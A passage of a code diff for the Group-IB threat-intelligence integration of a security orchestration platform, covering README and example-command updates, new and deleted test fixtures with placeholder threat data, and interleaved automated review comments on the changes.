- ] - } - - expected_output = {'downloadedFrom': '| URL | File Name | Domain | Date |\n' - '| --- | --------- | ------ | ---- |\n' - '| https://example.com | phish.zip | example.com | ' - '2023-10-16 |\n'} - - result = transform_some_fields_into_markdown(collection_name, feed) - - assert result == expected_output - - -def test_transform_some_fields_into_markdown_public_leak(): - from GroupIBTIA import transform_some_fields_into_markdown - - collection_name = "osi/public_leak" - feed = { - "linkList": [ - { - "author": "John Doe", - "dateDetected": "2023-10-16", - "datePublished": "2023-10-15", - "hash": "abcdef123456", - "link": "https://example.com", - "source": "Example Source" - }, - # ... - ], - "matches": { - "Type1": { - "SubType1": ["Value1", "Value2"], - "SubType2": ["Value3"] - }, - "Type2": { - "SubType3": ["Value4"] - } - } - } - - expected_output = {'linkList': '| Author | Date Detected | Date Published | Hash | Link | Source |\n' - '| ------ | ------------- | -------------- | ---- |----- | ------ |\n' - '| John Doe | 2023-10-16 | 2023-10-15 | abcdef123456 | ' - '[https://example.com](https://example.com) | Example Source |\n', - 'matches': '| Type | Sub Type | Value |\n' - '| ---- | -------- | ----- |\n' - '| Type1 | SubType1 | Value1 |\n' - '| Type1 | SubType1 | Value2 |\n' - '| Type1 | SubType2 | Value3 |\n' - '| Type2 | SubType3 | Value4 |\n'} - - result = transform_some_fields_into_markdown(collection_name, feed) - - assert result == expected_output - - -def test_get_human_readable_feed(): - from GroupIBTIA import get_human_readable_feed - - collection_name = "TestCollection" - feed = { - "id": 123, - "field1": "value1", - "field2": "value2", - "field3": "value3" - } - - expected_output = ('### Feed from TestCollection with ID 123\n' - '|field1|field2|field3|id|\n' - '|---|---|---|---|\n' - '| value1 | value2 | value3 | 123 |') - - result = get_human_readable_feed(collection_name, feed) - - assert result.strip() == expected_output.strip() + assert 
isinstance(result.outputs["collections"], list) diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/README.md b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/README.md index 88573756613d..08dd6a235605 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/README.md +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/README.md @@ -20,8 +20,13 @@ This integration was integrated and tested with version 1.0 of Group-IB Threat I | Colletions to fetch | Type\(s\) of incidents to fetch from the third party API. | False | | Incidents first fetch | Date to start fetching incidents from. | False | | Number of requests per collection | A number of requests per collection that integration sends in one faetch iteration \(each request picks up to 200 incidents\). If you face some runtime errors, lower the value. | False | +| Hunting Rules | To enable the collection of data using hunting rules, please select this parameter. | False | +## Note: + +Requests to the following collections come with the Hunting Rules parameter by default: `osi/git_repository, osi/public_leak, compromised/breached` + ## Commands You can execute these commands from the CLI, as part of an automation, or in a playbook. 
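Review bot: In test_fetch_incidents the line `collection_name, client = session_fixture` appears twice in a row, and although the docstring says the test "ensures that the command returns the correct types for next_run", `next_run` is unpacked and never inspected; drop the duplicate and add `assert isinstance(next_run, dict)` (the `last_run` argument is a dict, so next_run presumably is too — confirm) plus `assert incidents`, since the mocked `create_poll_generator` returns one real fixture page and an empty list should not pass. The module header uses `os.path.join(os.path.dirname(os.path.realpath(__file__)))` with a single argument, which is a no-op around dirname; `os.path.dirname(os.path.realpath(__file__))` reads more honestly. All tests for transform_function, find_element_by_key, transform_some_fields_into_markdown and get_human_readable_feed were deleted without replacement; the new import list no longer pulls transform_function, which suggests those helpers were removed or renamed in GroupIBTIA.py, but if any of them still exist this hunk is a coverage regression and deserves a sentence in the commit description. The fixture constant `AVALIBLE_COLLECTIONS_RAW_JSON` and the file it loads misspell "available"; cheaper to fix now than after other tests depend on the name.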
@@ -225,7 +230,7 @@ Command performs Group IB event lookup in compromised/account collection with pr >|client ipv4 ip|cnc cnc|cnc domain|cnc ipv4 asn|cnc ipv4 city|cnc ipv4 countryCode|cnc ipv4 countryName|cnc ipv4 ip|cnc ipv4 provider|cnc ipv4 region|cnc url|companyId|dateDetected|domain|evaluation admiraltyCode|evaluation credibility|evaluation reliability|evaluation severity|evaluation tlp|evaluation ttl|id|login|malware id|malware name|malware stixGuid|oldId|password|portalLink|silentInsert|sourceType|stixGuid| >|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---| ->| 0.0.0.0 | | some.ru | AS1111 | Moscow | RU | Russian Federation | 11.11.11.11 | some.ru | Moscow | http://some.ru | -1 | 2020-02-22T01:21:03+00:00 | some.ru | A2 | 80 | 100 | red | red | 90 | 253b9a136f0d574149fc43691eaf7ae27aff141a | some.ru | 411ac9df6c5515922a56e30013e8b8b366eeec80 | PredatorStealer | 2f7650f4-bc72-2068-d1a5-467b688975d8 | 396792583 | @some@ | | 0 | Botnet | 8abb3aa9-e351-f837-d61a-856901c3dc9d | +>| 0.0.0.0 | <<<<>>>> | some.ru | AS1111 | Moscow | RU | Russian Federation | 11.11.11.11 | some.ru | Moscow | http://some.ru | -1 | 2020-02-22T01:21:03+00:00 | some.ru | A2 | 80 | 100 | red | red | 90 | 253b9a136f0d574149fc43691eaf7ae27aff141a | some.ru | 411ac9df6c5515922a56e30013e8b8b366eeec80 | PredatorStealer | 2f7650f4-bc72-2068-d1a5-467b688975d8 | 396792583 | @some@ | | 0 | Botnet | 8abb3aa9-e351-f837-d61a-856901c3dc9d | >### URL indicator @@ -250,7 +255,7 @@ Command performs Group IB event lookup in compromised/account collection with pr ### gibtia-get-compromised-card-info *** -Command performs Group IB event lookup in compromised/card collection with provided ID. +Command performs Group IB event lookup in compromised/card collection with provided ID (DEPR). #### Base Command 
@@ -700,7 +705,7 @@ Command performs Group IB event lookup in compromised/mule collection with provi >|account|cnc cnc|cnc domain|cnc ipv4 ip|cnc url|dateAdd|evaluation admiraltyCode|evaluation credibility|evaluation reliability|evaluation severity|evaluation tlp|evaluation ttl|hash|id|malware id|malware name|malware stixGuid|oldId|organization name|portalLink|sourceType|stixGuid|type| >|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---| ->| 1111111111111111 | | some | 11.11.11.11 | http://some.ru | 2020-02-21T13:02:00+00:00 | A2 | 80 | 100 | red | amber | 30 | some | 50a3b4abbfca5dcbec9c8b3a110598f61ba90a99 | 5a2b741f8593f88178623848573abc899f9157d4 | Anubis | 7d837524-7b01-ddc9-a357-46e7136a9852 | 392993084 | Some | | Botnet | 2da6b164-9a12-6db5-4346-2a80a4e03255 | Person | +>| 1111111111111111 | <<<<>>>> | some | 11.11.11.11 | http://some.ru | 2020-02-21T13:02:00+00:00 | A2 | 80 | 100 | red | amber | 30 | some | 50a3b4abbfca5dcbec9c8b3a110598f61ba90a99 | 5a2b741f8593f88178623848573abc899f9157d4 | Anubis | 7d837524-7b01-ddc9-a357-46e7136a9852 | 392993084 | Some | | Botnet | 2da6b164-9a12-6db5-4346-2a80a4e03255 | Person | >### URL indicator @@ -724,7 +729,7 @@ Command performs Group IB event lookup in compromised/mule collection with provi ### gibtia-get-compromised-imei-info *** -Command performs Group IB event lookup in compromised/imei collection with provided ID. +Command performs Group IB event lookup in compromised/imei collection with provided ID (DEPR). #### Base Command 
@@ -891,7 +896,7 @@ Command performs Group IB event lookup in compromised/imei collection with provi >|client ipv4 asn|client ipv4 countryCode|client ipv4 countryName|client ipv4 ip|client ipv4 provider|cnc cnc|cnc domain|cnc ipv4 asn|cnc ipv4 countryCode|cnc ipv4 countryName|cnc ipv4 ip|cnc ipv4 provider|cnc url|dateDetected|device iccid|device imei|device imsi|device model|evaluation admiraltyCode|evaluation credibility|evaluation reliability|evaluation severity|evaluation tlp|evaluation ttl|id|malware id|malware name|malware stixGuid|oldId|operator number|portalLink|sourceType|stixGuid| >|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---| ->| AS11111 | NL | Netherlands | 11.11.11.11 | Some Company | | some.ru | AS11111 | FR | France | 11.11.11.11 | Some | http://some.ru | 2020-02-11T03:12:43+00:00 | ~ | Some | ~ | Nexus S/2.3.7 ($$$Flexnet v.5.5) | A2 | 80 | 100 | red | red | 30 | 0c1426048474df19ada9d0089ef8b3efce906556 | 8790a290230b3b4c059c2516a6adace1eac16066 | FlexNet | b51140c2-a88b-a95c-f5b0-1c5d1855ffde | 396766002 | ~ | | Botnet | 9cff66e9-c2b3-26ca-771a-c9e4d501c453 | +>| AS11111 | NL | Netherlands | 11.11.11.11 | Some Company | <<<<>>>> | some.ru | AS11111 | FR | France | 11.11.11.11 | Some | http://some.ru | 2020-02-11T03:12:43+00:00 | ~ | Some | ~ | Nexus S/2.3.7 ($$$Flexnet v.5.5) | A2 | 80 | 100 | red | red | 30 | 0c1426048474df19ada9d0089ef8b3efce906556 | 8790a290230b3b4c059c2516a6adace1eac16066 | FlexNet | b51140c2-a88b-a95c-f5b0-1c5d1855ffde | 396766002 | ~ | | Botnet | 9cff66e9-c2b3-26ca-771a-c9e4d501c453 | >### URL indicator 
@@ -1306,7 +1311,7 @@ Command performs Group IB event lookup in osi/vulnerability collection with prov >|bulletinFamily|cvss score|cvss vector|dateLastSeen|dateModified|datePublished|description|displayOptions isFavourite|displayOptions isHidden|evaluation admiraltyCode|evaluation credibility|evaluation reliability|evaluation severity|evaluation tlp|evaluation ttl|exploitCount|extCvss base|extCvss environmental|extCvss exploitability|extCvss impact|extCvss mImpact|extCvss overall|extCvss temporal|extCvss vector|extDescription|href|id|lastseen|modified|portalLink|provider|published|references|reporter|title|type| >|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---| ->| NVD | 7.5 | AV:N/AC:L/Au:N/C:P/I:P/A:P | 2021-02-11T14:35:24+03:00 | 2021-02-11T00:45:00+03:00 | 2021-02-10T19:15:00+03:00 | Description | false | false | A1 | 100 | 100 | red | green | 30 | 0 | 9.8 | 0.0 | 3.9 | 5.9 | 0.0 | 9.8 | 0.0 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | Big description | | CVE-2021-27152 | 2021-02-11T14:35:24+03:00 | 2021-02-11T00:45:00+03:00 | | some.ru | 2021-02-10T19:15:00+03:00 | ,
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-27152 | some.ru | CVE-2021-27152 | cve | +>| NVD | 7.5 | AV:N/AC:L/Au:N/C:P/I:P/A:P | 2021-02-11T14:35:24+03:00 | 2021-02-11T00:45:00+03:00 | 2021-02-10T19:15:00+03:00 | Description | false | false | A1 | 100 | 100 | red | green | 30 | 0 | 9.8 | 0.0 | 3.9 | 5.9 | 0.0 | 9.8 | 0.0 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | Big description | <<<<>>>> | CVE-2021-27152 | 2021-02-11T14:35:24+03:00 | 2021-02-11T00:45:00+03:00 | | some.ru | 2021-02-10T19:15:00+03:00 | ,
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-27152 | some.ru | CVE-2021-27152 | cve | >### softwareMixed table @@ -1318,7 +1323,7 @@ Command performs Group IB event lookup in osi/vulnerability collection with prov ### gibtia-get-phishing-kit-info *** -Command performs Group IB event lookup in bp/phishing_kit and attacks/phishing_kit collections with provided ID. +Command performs Group IB event lookup in bp/phishing_kit (DEPR) and attacks/phishing_kit collections with provided ID. #### Base Command @@ -1436,7 +1441,7 @@ Command performs Group IB event lookup in bp/phishing_kit and attacks/phishing_k ### gibtia-get-phishing-info *** -Command performs Group IB event lookup in bp/phishing and attacks/phishing collections with provided ID. +Command performs Group IB event lookup in bp/phishing and attacks/phishing collections with provided ID (DEPR). #### Base Command @@ -1918,7 +1923,7 @@ Command performs Group IB event lookup in attacks/deface collection with provide >|date|evaluation admiraltyCode|evaluation credibility|evaluation reliability|evaluation severity|evaluation tlp|evaluation ttl|id|mirrorLink|portalLink|providerDomain|siteUrl|source|targetDomain|targetIp countryName|targetIp ip|threatActor id|threatActor isAPT|threatActor name|tsCreate|url| >|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---| ->| 2021-01-21T02:22:18+00:00 | B2 | 80 | 80 | orange | amber | 30 | 6009637a1135cd001ef46e21 | : | | some.ru | | some.ru | some.ru | Indonesia | 11.11.11.11 | d7ff75c35f93dce6f5410bba9a6c206bdff66555 | false | FRK48 | 2021-01-21T11:19:52+00:00 | http://some.ru | +>| 2021-01-21T02:22:18+00:00 | B2 | 80 | 80 | orange | amber | 30 | 6009637a1135cd001ef46e21 | : | | some.ru | <<<<>>>> | some.ru | some.ru | Indonesia | 11.11.11.11 | d7ff75c35f93dce6f5410bba9a6c206bdff66555 | false | FRK48 | 2021-01-21T11:19:52+00:00 | http://some.ru | >### URL indicator 
@@ -2638,7 +2643,7 @@ Command performs Group IB event lookup in suspicious_ip/socks_proxy collection w ### gibtia-get-malware-targeted-malware-info *** -Command performs Group IB event lookup in malware/targeted_malware collection with provided ID. +Command performs Group IB event lookup in malware/targeted_malware collection with provided ID (DEPR). #### Base Command @@ -2888,7 +2893,7 @@ Command performs Group IB event lookup in malware/cnc collection by provided ID. >|cnc|dateDetected|dateLastSeen|domain|id|oldId|stixGuid|url| >|---|---|---|---|---|---|---|---| ->| | 2021-04-25T13:37:23+00:00 | 2021-04-25T13:37:23+00:00 | some.ru | aeed277396e27e375d030a91533aa232444d0089 | 211146923 | 417b2644-1105-d65b-4b67-a78e82f59b65 | https://some.ru | +>| <<<<>>>> | 2021-04-25T13:37:23+00:00 | 2021-04-25T13:37:23+00:00 | some.ru | aeed277396e27e375d030a91533aa232444d0089 | 211146923 | 417b2644-1105-d65b-4b67-a78e82f59b65 | https://some.ru | >### ipv4 table diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/command_examples.txt b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/command_examples.txt index 385f218d1f6d..3d99171c8928 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/command_examples.txt +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/command_examples.txt 
@@ -1,22 +1,22 @@
 !gibtia-get-available-collections
 !gibtia-get-compromised-account-info id=253b9a136f0d574149fc43691eaf7ae27aff141a
-!gibtia-get-compromised-card-info id=ecda6f4dc85596f447314ce01e2152db9c9d3cbc
+!gibtia-get-compromised-card-group-info id=ecda6f4dc85596f447314ce01e215
 !gibtia-get-compromised-breached-info id=277c4112d348c91f6dabe9467f0d18ba
-!gibtia-get-phishing-kit-info id=044f3f2cb599228c1882884eb77eb073f68a25f2
-!gibtia-get-phishing-info id=fce7f92d0b64946cf890842d083953649b259952
+!gibtia-get-phishing-group-info id=42a22d6c8d642ba628294b2c91acfe322ffe16dda3
 !gibtia-get-osi-git-leak-info id=ead0d8ae9f2347789941ebacde88ad2e3b1ef691
 !gibtia-get-osi-public-leak-info id=a09f2354e52d5fa0a8697c8df0b4ed99cc956273
-!gibtia-get-malware-targeted-malware-info id=5bbd38acf0b9e4f04123af494d485f6c49221e98
+!gibtia-get-osi-vulnerability-info id=CVE-2021-27152
+!gibtia-get-malware-malware-info id=83887a0fa2181a9a169ac65f5f6
 !gibtia-get-compromised-mule-info id=50a3b4abbfca5dcbec9c8b3a110598f61ba90a99
-!gibtia-get-compromised-imei-info id=0c1426048474df19ada9d0089ef8b3efce906556
 !gibtia-get-attacks-ddos-info id=26a05baa4025edff367b058b13c6b43e820538a5
 !gibtia-get-attacks-deface-info id=6009637a1135cd001ef46e21
 !gibtia-get-threat-info id=1b09d389d016121afbffe481a14b30ea995876e4 isAPT=true
-!gibtia-get-suspicious-ip-tor-node-info id=109.70.100.46
-!gibtia-get-suspicious-ip-open-proxy-info id=cc6a2856da2806b03839f81aa214f22dbcfd7369
-!gibtia-get-suspicious-ip-socks-proxy-info id=02e385600dfc5bf9b3b3656df8e0e20f5fc5c86e
+!gibtia-get-threat-actor-info id=0d4496592ac3a0f5511cd62ef2988 isAPT=true
+!gibtia-get-suspicious-ip-tor-node-info id=100.100.100.100
+!gibtia-get-suspicious-ip-open-proxy-info id=100.100.100.100
+!gibtia-get-suspicious-ip-socks-proxy-info id=100.100.100.100
+!gibtia-get-suspicious-ip-vpn-info id=100.100.100.100
+!gibtia-get-suspicious-ip-scanner-info id=100.100.100.100
 !gibtia-get-malware-cnc-info id=aeed277396e27e375d030a91533aa232444d0089
-!gibtia-get-osi-vulnerability-info id=CVE-2021-27152
-!gibtia-get-threat-actor-info id=0d4496592ac3a0f5511cd62ef29887f48d9cb545 isAPT=true
 !gibtia-global-search query=100.100.100.100
-!gibtia-local-search collection_name=attacks/phishing query=100.100.100.100
\ No newline at end of file
+!gibtia-local-search collection_name=attacks/phishing_group query=100.100.100.100
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/test_data/avalible_collections_example.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/test_data/avalible_collections_example.json
new file mode 100644
index 000000000000..1b543190df0e
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/test_data/avalible_collections_example.json
@@ -0,0 +1,37 @@
+[
+ "apt/threat",
+ "apt/threat_actor",
+ "hi/threat",
+ "hi/threat_actor",
+ "attacks/ddos",
+ "attacks/deface",
+ "attacks/phishing_group",
+ "attacks/phishing_kit",
+ "compromised/access",
+ "compromised/account_group",
+ "compromised/bank_card_group",
+ "compromised/breached",
+ "compromised/discord",
+ "compromised/masked_card",
+ "compromised/messenger",
+ "compromised/mule",
+ "compromised/reaper",
+ "malware/cnc",
+ "malware/config",
+ "malware/malware",
+ "malware/signature",
+ "malware/yara",
+ "osi/git_repository",
+ "osi/public_leak",
+ "osi/vulnerability",
+ "suspicious_ip/open_proxy",
+ "suspicious_ip/scanner",
+ "suspicious_ip/socks_proxy",
+ "suspicious_ip/tor_node",
+ "suspicious_ip/vpn",
+ "compromised/breached",
+ "compromised/account_group",
+ "compromised/reaper",
+ "compromised/bank_card_group",
+ "attacks/phishing_group"
+]
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/test_data/example.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/test_data/example.json
deleted file mode 100644
index 967a0523d7c2..000000000000
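Review bot: Several of the added example IDs do not match the 40-hex-character IDs used everywhere else in this file and look truncated or padded: `id=ecda6f4dc85596f447314ce01e215` (29 chars, a prefix of the removed 40-char value), `id=83887a0fa2181a9a169ac65f5f6` (27 chars), `id=0d4496592ac3a0f5511cd62ef2988` (29 chars, a prefix of the removed `0d4496592ac3a0f5511cd62ef29887f48d9cb545`), and `id=42a22d6c8d642ba628294b2c91acfe322ffe16dda3` (42 chars). If command_examples.txt is used to regenerate the README outputs these lookups will presumably return nothing; the threat-actor line at least can keep its known-good value, `!gibtia-get-threat-actor-info id=0d4496592ac3a0f5511cd62ef29887f48d9cb545 isAPT=true`. The examples for gibtia-get-phishing-kit-info and gibtia-get-phishing-info are dropped even though the README hunks in this same patch still document both commands (marked DEPR), so either keep one example each or note in the README that no example is provided.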
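Review bot: Five collections are listed twice in the new fixture — `compromised/breached`, `compromised/account_group`, `compromised/reaper`, `compromised/bank_card_group` and `attacks/phishing_group` each appear in the main run and again at the tail of the array. If this mirrors a real available-collections response the repetition is worth stating in the test that loads the file, since strict JSON leaves no room for a comment; if it does not, a test that iterates this list for fetching would presumably process those collections twice, so deduplicating the fixture is the safer choice. The file name `avalible_collections_example.json` is also misspelled; harmless, but easier to correct before more tests reference it.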
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/test_data/example.json
+++ /dev/null
@@ -1,684 +0,0 @@ -{ - "compromised/account_group":[ - [ - {"dateFirstCompromised": null, - "dateFirstSeen": "2022-10-20T18:12:28+00:00", - "dateLastCompromised": null, - "dateLastSeen": "2022-10-20T18:12:28+00:00", - "displayOptions": { - "favouriteForCompanies": [], - "hideForCompanies": [], - "isFavourite": false, - "isHidden": false - }, - "evaluation": { - "admiraltyCode": "A2", - "credibility": 80, - "reliability": 100, - "severity": "red", - "tlp": "red", - "ttl": 30 - }, - "eventCount": 1, - "events": [ - { - "client": { - "ipv4": { - "asn": "ASN", - "city": "City", - "countryCode": "Code", - "countryName": "Country Name", - "ip": "11.11.11.11", - "provider": "provider", - "region": "region" - }, - "ipv6": null - }, - "cnc": { - "cnc": "https://some.ru", - "domain": "some.ru", - "ipv4": { - "asn": "ASN", - "city": "City", - "countryCode": "Code", - "countryName": "Country Name", - "ip": "11.11.11.11", - "provider": "provider", - "region": "region" - }, - "ipv6": null, - "url": "https://some.ru" - }, - "dateCompromised": null, - "dateDetected": "2022-10-20T18:12:28+00:00", - "id": "1111111111111111111111111111111111111111", - "malware": { - "category": [], - "class": null, - "id": "1111111111111111111111111111111111111111", - "name": "AZORult", - "platform": [], - "stixGuid": "1111111111111111111111111111111111111111", - "threatLevel": null - }, - "oldId": "11111111", - "person": null, - "source": { - "id": "", - "idType": "", - "type": "Botnet" - }, - "stixGuid": "1111111111111111111111111111111111111111", - "threatActor": null - } - ], - "id": "1111111111111111111111111111111111111111", - "login": "some@gmail.com", - "malware": [ - { - "category": [], - "class": null, - "id": "1111111111111111111111111111111111111111", - "name": "Name", - "platform": [], - "stixGuid": null, - "threatLevel": null - } - ], - "parsedLogin": { - "domain": "some.com", - "ip": null - }, - "password": "?", - "port": null, - "portalLink": null, - "seqUpdate": 1670823245323, - 
"service": { - "domain": "some.com", - "host": "some.com", - "ip": null, - "url": "https://some.ru" - }, - "source": [ - { - "id": "", - "idType": "", - "type": "Botnet" - } - ], - "sourceId": [], - "sourceType": [ - "Botnet" - ], - "threatActor": []} - ], - 1614919893874 - ], - "compromised/account": [ - [ - { - "botId": null, - "client": { - "ipv4": { - "asn": null, - "city": null, - "countryCode": null, - "countryName": null, - "ip": "0.0.0.0", - "provider": null, - "region": null - } - }, - "cnc": { - "cnc": "http://some.ru", - "domain": "some.ru", - "ipv4": { - "asn": "ASN", - "city": "City", - "countryCode": "Code", - "countryName": "Country Name", - "ip": "11.11.11.11", - "provider": "Provider", - "region": "Country" - }, - "ipv6": null, - "url": "http://some.ru" - }, - "dateCompromised": null, - "dateDetected": "2019-12-12T09:51:07+00:00", - "device": null, - "domain": "some.ru", - "dropEmail": { - "domain": null, - "email": "", - "ipv4": { - "asn": null, - "city": null, - "countryCode": null, - "countryName": null, - "ip": null, - "provider": null, - "region": null - } - }, - "evaluation": { - "admiraltyCode": "A2", - "credibility": 80, - "reliability": 100, - "severity": "red", - "tlp": "red", - "ttl": 90 - }, - "id": "253b9a136f0d574149fc43691eaf7ae27aff141a", - "isFavourite": false, - "isHidden": false, - "login": "some@gmail.ru", - "malware": { - "id": "411ac9df6c5515922a56e30013e8b8b366eeec80", - "name": "PredatorStealer" - }, - "oldId": "396792583", - "password": "password", - "person": { - "address": null, - "birthday": null, - "city": null, - "countryCode": null, - "email": null, - "name": null, - "passport": null, - "phone": null, - "state": null, - "taxNumber": null, - "zip": null - }, - "port": null, - "portalLink": "https://bt.group-ib.com/cd/accounts?searchValue=id:253b9a136f0d574149fc43691eaf7ae27aff141a", - "seqUpdate": 1614919893874, - "sourceType": "Botnet", - "threatActor": { - "country": null, - "id": 
"d7ff75c35f93dce6f5410bba9a6c206bdff66555", - "isAPT": false, - "name": "name TA" - } - } - ], - 1614919893874 - ], - "compromised/card": [ - [ - { - "baseName": "Name", - "cardInfo": { - "cvv": null, - "dump": null, - "issuer": { - "countryCode": "Code", - "countryName": "Country Name", - "issuer": "SOME BANK" - }, - "number": "545123XXXXXXXXXX", - "system": "VISA", - "type": "CLASSIC", - "validThru": "09/2025" - }, - "client": { - "ipv4": { - "asn": null, - "city": null, - "countryCode": null, - "countryName": null, - "ip": null, - "provider": null, - "region": null - } - }, - "cnc": { - "cnc": "some.ru", - "domain": "some.ru", - "ipv4": { - "asn": null, - "city": "City", - "countryCode": "Code", - "countryName": "Country Name", - "ip": "11.11.11.11", - "provider": "Cloudflare", - "region": "California" - }, - "ipv6": null, - "url": null - }, - "dateCompromised": "2019-12-12T10:41:00+00:00", - "dateDetected": "2019-12-12T10:57:49+00:00", - "evaluation": { - "admiraltyCode": "A2", - "credibility": 80, - "reliability": 90, - "severity": "red", - "tlp": "red", - "ttl": 90 - }, - "externalId": "12312", - "id": "ecda6f4dc85596f447314ce01e2152db9c9d3cbc", - "isFavourite": false, - "isHidden": false, - "malware": {"id": "53013c863116aae720581ff2aa2b4f92d3cb2bd7", "name": "mandarincc"}, - "oldId": "396798216", - "owner": { - "address": null, - "birthday": null, - "city": "Something", - "countryCode": "US", - "email": null, - "name": "Name", - "passport": null, - "phone": "932876", - "state": "Ohio", - "taxNumber": null, - "zip": null - }, - "portalLink": "https://bt.group-ib.com/cd/cards?searchValue=id:ecda6f4dc85596f447314ce01e2152db9c9d3cbc", - "price": {"currency": "USD", "value": "13213"}, - "seqUpdate": 1614923910464, - "serviceCode": null, - "sourceType": "Card shop", - "threatActor": { - "country": null, - "id": "d7ff75c35f93dce6f5410bba9a6c206bdff66555", - "isAPT": false, - "name": "FRK48" - }, - "track": [] - } - ], - 1614923910464 - ], - "bp/phishing": [ - [ - 
{ - "dateBlocked": null, - "dateDetected": "2021-01-14T11:21:34+00:00", - "evaluation": { - "admiraltyCode": "A2", - "credibility": 80, - "reliability": 90, - "severity": "red", - "tlp": "amber", - "ttl": 30 - }, - "history": [ - { - "date": "2021-01-13T11:20:50+00:00", - "field": "Detected", - "reason": "In response", - "reporter": "Group-IB Intelligence", - "value": "In response" - }, - { - "date": "2021-01-14T11:20:50+00:00", - "field": "Status has been changed", - "reason": "-", - "reporter": "Group-IB Intelligence", - "value": "In response" - } - ], - "id": "fce7f92d0b64946cf890842d083953649b259952", - "ipv4": { - "asn": null, - "city": "Some city", - "countryCode": "CA", - "countryName": "Canada", - "ip": "11.11.11.11", - "provider": "Some provider", - "region": "NA" - }, - "isFavourite": false, - "isHidden": false, - "oldId": "396798526", - "phishingDomain": { - "domain": "some.ru", - "local": "some.ru", - "dateRegistered": "2013-11-15 13:41:30", - "title": "", - "registrar": "Some" - }, - "portalLink": "https://bt.group-ib.com/attacks/phishing?searchValue=id:fce7f92d0b64946cf890842d083953649b259952", - "seqUpdate": 1614925293641, - "status": "In response", - "targetBrand": "Some brand", - "targetCategory": "Finance > Banking", - "targetCountryName": null, - "targetDomain": "some.ru", - "type": "Phishing", - "url": "https://some.ru" - } - ], - 1614925293641 - ], - "bp/phishing_kit": [ - [ - { - "dateDetected": "2021-01-14T12:10:41+00:00", - "dateFirstSeen": "2021-01-14T13:10:41+00:00", - "dateLastSeen": "2021-01-14T14:12:17+00:00", - "downloadedFrom": [ - { - "date": "2021-01-21 10:10:41", - "url": "https://some.ru", - "domain": "some.ru", - "fileName": "show.zip" - }, - { - "date": "2021-01-21 10:10:41", - "url": "https://some.ru", - "domain": "some.ru", - "fileName": "show.zip" - }, - { - "date": "2021-01-21 10:10:41", - "url": "https://some.ru", - "domain": "some.ru", - "fileName": "show.zip" - } - ], - "emails": [], - "evaluation": { - "admiraltyCode": 
"B2", - "credibility": 70, - "reliability": 80, - "severity": "orange", - "tlp": "amber", - "ttl": 30 - }, - "hash": "8d7ea805fe20d6d77f57e2f0cadd17b1", - "id": "044f3f2cb599228c1882884eb77eb073f68a25f2", - "isFavourite": false, - "isHidden": false, - "oldId": "396793696", - "path": "https://tap.group-ib.com/api/api/v2/web/attacks/phishing_kit/044f3f2cb599228c1882884eb77eb073f68a25f2/file/95b61a1df152012abb79c3951ed98680e0bd917bbcf1d440e76b66a120292c76", - "portalLink": "https://bt.group-ib.com/attacks/phishing_kit?searchValue=id:044f3f2cb599228c1882884eb77eb073f68a25f2", - "seqUpdate": 1614921031175, - "targetBrand": [], - "tsFirstSeen": null, - "tsLastSeen": null, - "variables": null - } - ], - 1614921031175 - ], - "osi/git_repository": [ - [ - { - "company": [], - "companyId": [ - 3150 - ], - "contributors": [ - { - "authorEmail": "some@email.com", - "authorName": "somename" - }, - { - "authorEmail": "some@email.com", - "authorName": "somename" - }, - { - "authorEmail": "some@email.com", - "authorName": "somename" - } - ], - "dataFound": { - "password": 8, - "apikey": 2, - "secret": 1 - }, - "dateCreated": "2021-01-23T22:12:58+03:00", - "dateDetected": "2021-01-28T22:32:54+03:00", - "evaluation": { - "admiraltyCode": "A1", - "credibility": 50, - "reliability": 50, - "severity": "orange", - "tlp": "amber", - "ttl": 30 - }, - "favouriteForCompanies": [], - "files": [ - { - "dataFound": [], - "dateCreated": "1970-01-01T03:00:00+03:00", - "dateDetected": "2021-01-28T19:37:08+00:00", - "evaluation": { - "admiraltyCode": "A1", - "credibility": 30, - "reliability": 100, - "severity": "gray", - "tlp": "amber", - "ttl": 30 - }, - "id": "1111111111111111111111111111111111111111", - "matchesType": [ - "readme" - ], - "matchesTypeCount": { - "readme": 1 - }, - "name": "example.txt", - "revisions": [ - { - "bind": [ - { - "bindBy": "", - "companyId": 0, - "data": "", - "ruleId": 0, - "type": "readme" - } - ], - "data": null, - "hash": 
